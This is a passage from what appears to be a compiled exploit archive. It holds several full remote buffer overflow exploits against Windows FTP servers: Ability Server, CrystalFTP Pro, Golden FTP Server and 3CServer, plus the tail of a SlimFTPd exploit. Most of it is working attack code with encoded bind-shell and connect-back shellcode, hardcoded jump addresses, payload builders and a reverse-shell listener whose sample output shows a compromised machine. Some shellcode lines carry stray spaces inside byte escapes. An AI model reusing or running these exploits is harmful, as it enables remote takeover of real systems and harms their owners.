cout<<" [+] 1. Win2k SP4 English Pro (*)"<<endl;
cout<<" [+] 1. Win2k SP4 English Server (*)"<<endl;
cout<<" [+] 1. Win2k all others "<<endl;
cout<<" [+] 2. WinXP SP1 English Pro (*)"<<endl;
cout<<" [+] 2. WinXP SP1 French Pro (*)"<<endl;
cout<<" [+] 2. WinXP all others "<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 21 is default if no port are specified"<<endl;
cout<<" The exploit bind a shellcode to the port 101"<<endl;
cout<<" A wildcard (*) mean Tested."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ================================================== =[v0.1]===="<<endl;
cout<<" ========SlimFTPd, Tiny FTP Server for Windows <= v3.15======="<<endl;
cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<" ================================================== ==========="<<endl;
cout<<" "<<endl;
}
// [2004-11-10]
21 Ability Server <= 2.34 Remote APPE Buffer Overflow Exploit
/*
TESTED ON WINXP SP0 RUS
(c) by Dark Eagle
from unl0ck research team
http://unl0ck.void.ru
HAPPY NEW YEAR!
Greetz go out to: nekd0, antiq, fl0wsec (setnf, nuTshell), nosystem (CoKi), reflux...
*/
#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
// shellc0de by m00 team bind 61200
char shellcode[]=
"\x90\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\xBB\x40\x 81\x38\x6D"
"\x30\x30\x21\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\x 52\xD7\xBA"
"\xBB\xBB\xE6\xEE\x8A\x60\xDF\x30\xB8\xFB\x28\x30\x F8\x44\xFB"
"\xCE\x42\x30\xE8\xB8\xDD\x8A\x69\xDD\x03\xBB\xAB\x DD\x3A\x81"
"\xF6\xE1\xCF\xBC\x92\x79\x52\x49\x44\x44\x44\x32\x 68\x30\xC1"
"\x87\xBA\x6C\xB8\xE4\xC3\x30\xF0\xA3\x30\xC8\x9B\x 30\xC0\x9F"
"\xBA\x6D\xBA\x6C\x47\x16\xBA\x6B\x2D\x3C\x46\xEA\x 8A\x72\x3B"
"\x7A\xB4\x48\x1D\xC9\xB1\x2D\xE2\x3C\x46\xCF\xA9\x FC\xFC\x59"
"\x5D\x05\xB4\xBB\xBB\xBB\x92\x75\x92\x4C\x52\x53\x 44\x44\x44"
"\x8A\x7B\xDD\x30\xBC\x7A\x5B\xB9\x30\xC8\xA7\xBA\x 6D\xBA\x7D"
"\x16\xBA\x6B\x32\x7D\x32\x6C\xE6\xEC\x36\x26\xB4\x BB\xBB\xBB"
"\xE8\xEC\x44\x6D\x36\x26\xE8\xBB\xBB\xBB\xE8\x44\x 6B\x32\x7C"
"\x36\x3E\xE1\xBB\xBB\xBB\xEB\xEC\x44\x6D\x36\x36\x 2C\xBB\xBB"
"\xBB\xEA\xD3\xB9\xBB\xBB\xBB\x44\x6B\x36\x26\xDE\x BB\xBB\xBB"
"\xE8\xEC\x44\x6D\x8A\x72\xEA\xEA\xEA\xEA\xD3\xBA\x BB\xBB\xBB"
"\xD3\xB9\xBB\xBB\xBB\x44\x6B\x32\x78\x36\x3E\xCB\x BB\xBB\xBB"
"\xEB\xEC\x44\x6D\xD3\xAB\xBB\xBB\xBB\x36\x36\x38\x BB\xBB\xBB"
"\xEA\xE8\x44\x6B\x36\x3E\xCE\xBB\xBB\xBB\xEB\xEC\x 44\x6D\xD3"
"\xBA\xBB\xBB\xBB\xE8\x44\x6B\x36\x3E\xC7\xBB\xBB\x BB\xEB\xEC"
"\x44\x6D\x8A\x72\xEA\xEA\xE8\x44\x6B\xE4\xEB\x36\x 26\xFC\xBB"
"\xBB\xBB\xE8\xEC\x44\x6D\xD3\x44\xBB\xBB\xBB\xD3\x FB\xBB\xBB"
"\xBB\x44\x6B\x32\x78\x36\x36\x93\xBB\xBB\xBB\xEA\x EC\x44\x6D"
"\xE8\x44\x6B\xE3\x32\xF8\xFB\x32\xF8\x87\x32\xF8\x 83\x7C\xF8"
"\x97\xBA\xBA\xBB\xBB\x36\x3E\x83\xBB\xBB\xBB\xEB\x EC\x44\x6D"
"\xE8\xE8\x8A\x72\xEA\xEA\xEA\xD3\xBA\xBB\xBB\xBB\x EA\xEA\x36"
"\x26\x04\xBB\xBB\xBB\xE8\xEA\x44\x6B\x36\x3E\xA7\x BB\xBB\xBB"
"\xEB\xEC\x44\x6D\x44\x6B\x53\x34\x45\x44\x44\xFC\x DE\xCF\xEB"
"\xC9\xD4\xD8\xFA\xDF\xDF\xC9\xDE\xC8\xC8\xBB\xF7\x D4\xDA\xDF"
"\xF7\xD2\xD9\xC9\xDA\xC9\xC2\xFA\xBB\xFE\xC3\xD2\x CF\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xBB\xFC\xDE\xCF\xE8\xCF\xDA\x C9\xCF\xCE"
"\xCB\xF2\xD5\xDD\xD4\xFA\xBB\xF8\xC9\xDE\xDA\xCF\x DE\xEB\xC9"
"\xD4\xD8\xDE\xC8\xC8\xFA\xBB\xFC\xD7\xD4\xD9\xDA\x D7\xFA\xD7"
"\xD7\xD4\xD8\xBB\xCC\xC8\x89\xE4\x88\x89\xBB\xEC\x E8\xFA\xE8"
"\xCF\xDA\xC9\xCF\xCE\xCB\xBB\xEC\xE8\xFA\xE8\xD4\x D8\xD0\xDE"
"\xCF\xFA\xBB\xD9\xD2\xD5\xDF\xBB\xD7\xD2\xC8\xCF\x DE\xD5\xBB"
"\xDA\xD8\xD8\xDE\xCB\xCF\xBB\xB9\xBB\x54\xAB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBA\xBB\xBB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\x BB\xBB\xBB"
"\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xD8\xD6\xDF\xBB\x6D\x 30\x30\x21";
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
WSADATA wsa;
struct sockaddr_in sa;
WSAStartup(MAKEWORD(2,0), &wsa);
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
printf("gethostbyname() error!\n"); exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
printf("socket\n");
exit(0);
}
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
{printf("connect() error!\n");
exit(0);
}
printf("connected to %s\n", host);
return sock;
}
void login(int sock, char *login, char *pass)
{
FILE *file;
char ubuf[1000], pbuf[1000], rc[200];
int i;
char bochka[2000], med[2000];
file = fopen("bochka.txt", "w+");
memset(bochka, 0x00, 2000);
memset(bochka, 0x43, 1000);
*(long*)&bochka[969] = 0x77F5801C; // ntdll.dll JMP ESP ADDR...
memcpy(bochka+strlen(bochka), &shellcode, sizeof(shellcode));
sprintf(med, "APPE %s\r\n", bochka);
fprintf(file, "%s", med);
if ( strlen(pass) >= 100 ) { printf("2 long password!\n"); exit(0); }
if ( strlen(login) >= 100 ) { printf("2 long login!\n"); exit(0); }
sprintf(ubuf, "USER %s\r\n", login);
send(sock, ubuf, strlen(ubuf), 0);
printf("USER sending...\n");
Sleep(1000);
printf("OK!\n");
sprintf(pbuf, "PASS %s\r\n", pass);
send(sock, pbuf, strlen(pbuf), 0);
printf("PASS sending...\n");
Sleep(1000);
recv(sock, rc, 200, 0);
if ( strstr(rc, "530")) {printf("Bad password!\n"); exit(0); }
printf("OK!\n");
Sleep(1000);
printf("Sending 604KY C MEDOM!\n");
send(sock, med, strlen(med), 0);
Sleep(1000);
printf("TrY To CoNnEcT tO...\n\n");
}
int main(int argc, char **argv)
{
int sock = 0;
int data;
printf("\nAbility FTP Server <= 2.34 R00T exploit\n");
printf("by Dark Eagle [ unl0ck team ]\nhttp://unl0ck.void.ru\n\n");
if ( argc < 4 ) { printf("usage: un-aftp.exe <host> <username> <password>\n\n"); exit(0); }
sock = conn(argv[1], 21);
login(sock, argv[2], argv[3]);
closesocket(sock);
Sleep(2000);
return 0;
}
//Reference:
//2004-10-23
//Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit
//KaGra
//http://www.enigmagroup.org/id.php?id=592
// [2004-12-16]
21 CrystalFTP Pro 2.8 Remote Buffer Overflow Exploit
/*
* CrystalFTP Pro v2.8 Buffer Overflow Exploit
*
* 04/25/2005
*
* despite the fact that nobody uses CrystalFTP
* i had to release a new version that replaces
* the first one.
*
* this overwrites the structured exception handler
* with a "pop edx pop eax ret" in kernel32.dll.
* this takes us to a pointer of the next SEH.
* just jmp over the SEH itself and reverse code
* gets executed.
*
* add more targets if needed
*
* have phun
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ local IP: 192.168.2.102
* --[ incomming connection from: 192.168.2.103
* --[ sending welcome message...done!
* --[ getting login information
* --[ reading USER...done!
* --[ reading PASS...done!
* USER LOGGED IN!
* --[ proceeding...
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ reading cmd...done!
* --[ entering passive mode...
* --[ passive connection established!
* --[ reading cmd...done!
* --[ user is trying to use "LIST" command
* --[ w00d w00d, let`s kick his ass...
* --[ sending packet [ 711 bytes ]...done!
* --[ confirming...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.103
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\crystalFTP>
*
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
/*
*
* definitions
*
*/
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 21
#define PASV 31337
#define BACKLOG 5
/*
*
* prototypes
*
*/
int isip ( char* ip );
int shell ( int s, char* tip, unsigned short cbport );
char* get_cmd ( int s );
void auth ( int s );
void handle_cmd ( int s, int connfd, char* ip );
void header ();
void start_reverse_handler ();
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\x C6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x 91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x 99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x 1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x 99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x 12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\x C8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\x A9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x 89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\x BD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\x EF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x 66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x 4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x 96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x 86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x 9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x 17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x 52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
unsigned char head[] =
"\x2d\x72\x77\x2d\x72\x2d\x2d\x72\x2d\x2d\x20\x20\x 20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x 20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x32\x39\x20\x44\x 65\x63\x20\x32"
"\x32\x20\x31\x33\x3a\x33\x37\x20\x63\x79\x62\x65\x 72\x74\x72\x6f"
"\x6e\x69\x63\x2e";
char* argv3 = NULL;
/*
*
* functions
*
*/
int
isip ( char* ip )
{
unsigned int a, b, c, d;
sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
if ( a < 1 || a > 255 )
return ( 1 );
if ( b < 0 || b > 255 )
return ( 1 );
if ( c < 0 || c > 255 )
return ( 1 );
if ( d < 0 || d > 255 )
return ( 1 );
return ( 0 );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
char*
get_cmd ( int s )
{
static char cmd[32];
printf ( "--[" YELLOW " reading cmd..." NORMAL );
if ( read ( s, cmd, 32 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
return ( cmd );
}
void
auth ( int s )
{
char user[32], pass[32], out[128];
printf ( "--[ sending welcome message..." );
bzero ( &out, 128 );
strcpy ( out, "220 cybertronicFTP v0.2\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
printf ( "--[ getting login information\n" );
printf ( "--[" YELLOW " reading USER..." NORMAL );
sleep ( 1 );
if ( read ( s, user, 32 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "331 Anonymous FTP server\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[" YELLOW " reading PASS..." NORMAL );
sleep ( 1 );
if ( read ( s, pass, 32 ) <= 0 )
{
printf ( RED "failed\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL );
sleep ( 1 );
bzero ( &out, 128 );
strcpy ( out, "230 Login successful!\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "\tUSER LOGGED IN!\n" NORMAL );
printf ( "--[ proceeding...\n" );
}
void
handle_cmd ( int s, int s2, char* ip )
{
int listenfd, connfd;
int i = 1;
int tmp[4];
unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll
char* a = NULL;
char* cmd;
char out[128], buffer[1024], addr[32];
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
while ( 1 )
{
cmd = get_cmd ( s );
if ( strncmp ( cmd, "PWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "200 Type set to A..\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
{
bzero ( &addr, 32 );
a = ( char* ) strtok ( ip, "." );
tmp[0] = ( int ) a;
while ( a != NULL )
{
a = ( char* ) strtok ( NULL, "." );
tmp[i] = ( int )a;
i++;
}
bzero ( &out, 128 );
sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ entering passive mode...\n" );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PASV );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, 1 ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
close ( listenfd );
printf ( "--[" GREEN " passive connection established!\n" NORMAL );
handle_cmd ( s, connfd, addr );
}
else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
{
printf ( "--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL );
printf ( "--[ w00d w00d, let`s kick his ass...\n" );
bzero ( &buffer, 1024 );
memcpy ( buffer, head, sizeof ( head ) - 1 );
memset ( buffer + 68, 0x90, 255 );
memcpy ( buffer + 321, "\xeb\x46", 2 );
strncat ( buffer, ( unsigned char * ) &ret, 4 );
memset ( buffer + 327, 0x90, 66 );
memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( buffer, "\r\n" );
bzero ( &out, 128 );
strcpy ( out, "150 Here comes the directory listing.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ sending packet [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s2, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
bzero ( &out, 128 );
strcpy ( out, "226 Transfer ok\r\n" );
printf ( "--[ confirming..." );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
close ( s2 );
start_reverse_handler ( argv3 );
}
else
{
bzero ( &out, 128 );
strcpy ( out, "550 command not supported\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
}
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
start_reverse_handler ()
{
int s1, s2;
unsigned short cbport;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
sscanf ( argv3, "%u", &cbport );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[" GREEN " incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
unsigned long xoredip;
unsigned short xoredcbport;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
if ( argc != 3 )
{
printf ( RED "--[ usage: %s <connectback ip> <connectback port>\n" NORMAL, argv[0] );
exit ( 1 );
}
if ( isip ( argv[1] ) != 0 )
{
printf ( RED "--[ enter a valid IP\n" NORMAL );
exit ( 1 );
}
system ( "clear" );
header ();
argv3 = argv[2];
xoredip = inet_addr ( argv[1] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[2] ) ) ^ ( unsigned short ) 0x9999;
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
ip = ( char* ) ( argv[1] );
printf ( "--[ local IP: %s\n", ip );
printf ( "--[" GREEN " incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
auth ( connfd );
handle_cmd ( connfd, ( int ) NULL, ip );
}
close ( connfd );
}
}
// [2005-04-24]
21 Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
# Barabas - www.whitehat.co.il -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444
use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None http://metasploit.com
$payload .="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\xe3".
"\x30\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\x c0\x74\x07\xc1".
"\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe3\x 8b\x5f\x24\x01".
"\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x 8b\x89\x6c\x24".
"\x1c\x61\xc3\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x 8b\x70\x1c\xad".
"\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x 31\xdb\x66\x53".
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0\x 68\xcb\xed\xfc".
"\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x 55\x6a\x02\xff".
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x 53\x53\x43\x53".
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1\x 95\x68\xa4\x1a".
"\x70\xc7\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x68\x a4\xad\x2e\xe9".
"\x57\xff\xd6\x53\x55\xff\xd0\x68\xe5\x49\x86\x49\x 57\xff\xd6\x50".
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57\x ff\xd6\x55\xff".
"\xd0\x66\x6a\x64\x66\x68\x63\x6d\x89\xe5\x6a\x50\x 59\x29\xcc\x89".
"\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\x fe\x42\x2c\x93".
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x 75\x44\xff\xd6".
"\x5b\x57\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\x ff\xd0\x68\xad".
"\xd9\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x 8b\x57\xfc\x83".
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x 53\xff\xd6\xff".
"\xd0";
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("ftp","ftp");
$ftp->quot("RNTO",$payload);
# [2005-01-22]
21 3CServer 1.1 FTP Server Remote Exploit
/*
subject: Proof of Concept exploit for 3CServer v1.1 FTP server
vendor: 3Com, http://support.3com.com/software/utilities_for_windows_32_bit.htm
`date`: Mon Feb 7 18:10:01 2005
notes: universal offset, SEH ptr overwriting with variation
author: mandragore, mandragore@[email protected]
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"
#define YELL "\033[01;33m"
#define RED "\033[01;31m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.0 for " RED "3CServer v1.1.007" NORM
#define fatal(x) { perror(x); exit(1); }
#define default_port 21
#define default_user "anonymous"
#define default_pass "[email protected]"
#define GPA 0x0045b968
#define LLA 0x0045b964
#define offset 0x418A19 // call eax
unsigned char bsh[]={
// 198 bytes, iat's gpa at 0x1a, iat's lla at 0x2b, port at 0x46 (1180), key 0xde
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0, 0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60, 0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21, 0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4, 0x90,0x89,0x21,0xC8,0x21,0x0E,
0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A, 0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
